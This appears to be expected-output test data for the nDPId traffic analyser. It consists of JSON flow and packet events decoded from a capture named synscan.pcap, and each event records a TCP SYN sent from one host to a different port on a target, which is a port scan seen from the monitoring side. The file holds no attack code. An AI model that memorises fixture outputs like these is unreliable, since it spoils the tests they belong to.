+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1023,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1014,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsLiYAADEG6UysEAAIQA2GNIzSBvfdUoMYAAAAAGACCAApmAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1024,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwgAAC0G+GqsEAAIQA2GNIzSEV3dUoMYAAAAAGACCAAfMgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1025,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsbtYAADYGo5ysEAAIQA2GNIzSCU3dUoMYAAAAAGACDAAjQgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":45100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1017,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsggcAADcGj2usEAAIQA2GNIzSsCzdUoMYAAAAAGACEAB4YgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1027,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1018,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsi00AADgGhSWsEAAIQA2GNIzSG2vdUoMYAAAAAGACBAAZJAAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1028,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1019,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsjTgAADgGgzqsEAAIQA2GNIzSQmDdUoMYAAAAAGACBADyLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1029,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1020,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2LgAACgGR7qsEAAIQA2GNIzSBJbdUoMYAAAAAGACBAAv+QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1021,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsKigAACwG8kqsEAAIQA2GNIzSNdbdUoMYAAAAAGACBAD+uAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1022,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAskrkAADsGermsEAAIQA2GNIzSFw7dUoMYAAAAAGACEAARgQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1023,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsqEIAACUGezCsEAAIQA2GNIzSJpbdUoMYAAAAAGACCAAJ+QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":667,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1024,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAswmIAADUGURCsEAAIQA2GNIzSApvdUoMYAAAAAGACCAAt9AAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1025,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAs2UYAACYGSSysEAAIQA2GNIzSI3jdUoMYAAAAAGACDAAJFwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060066,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1026,"flow_packet_id":1,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060066,"pkt":"ACYLMQczACWzv5HuCABFAAAsOl0AACcG5xWsEAAIQA2GNIzSE+7dUoMYAAAAAGACEAAUoQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1036,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1027,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSLAAADAGz8KsEAAIQA2GNIzSFvXdUoMYAAAAAGACBAAdmgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1037,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1037,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1028,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsSH8AADcGyPOsEAAIQA2GNIzSBA3dUoMYAAAAAGACEAAkggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5907,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1038,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1029,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsWcgAADcGt6qsEAAIQA2GNIzSFxPdUoMYAAAAAGACEAARfAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1030,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAs2jgAACwGQjqsEAAIQA2GNIzSANPdUoMYAAAAAGACBAAzvAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060067,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060067,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2035,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1040,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1031,"flow_packet_id":1,"flow_last_seen":1278275060067,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060067,"pkt":"ACYLMQczACWzv5HuCABFAAAsdCsAADsGmUesEAAIQA2GNIzSB\/PdUoMYAAAAAGACEAAgnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1032,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsb8MAADgGoK+sEAAIQA2GNIzSAJDdUoMYAAAAAGACBAAz\/wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1042,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1033,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsXXkAADcGs\/msEAAIQA2GNIzSBFjdUoMYAAAAAGACEAAkNwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2170,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1043,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1034,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsZeIAADsGp5CsEAAIQA2GNIzSCHrdUoMYAAAAAGACEAAgFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1035,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsVbcAADIGwLusEAAIQA2GNIzSF9XdUoMYAAAAAGACDAAUugAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1036,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsFoAAADQG\/fKsEAAIQA2GNIzSAyDdUoMYAAAAAGACBAAxbwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1037,"flow_packet_id":1,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060071,"pkt":"ACYLMQczACWzv5HuCABFAAAsLm4AADIG6ASsEAAIQA2GNIzSIyLdUoMYAAAAAGACDAAJbQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1047,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1038,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060071,"flow_last_seen":1278275060071,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060071,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2399,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
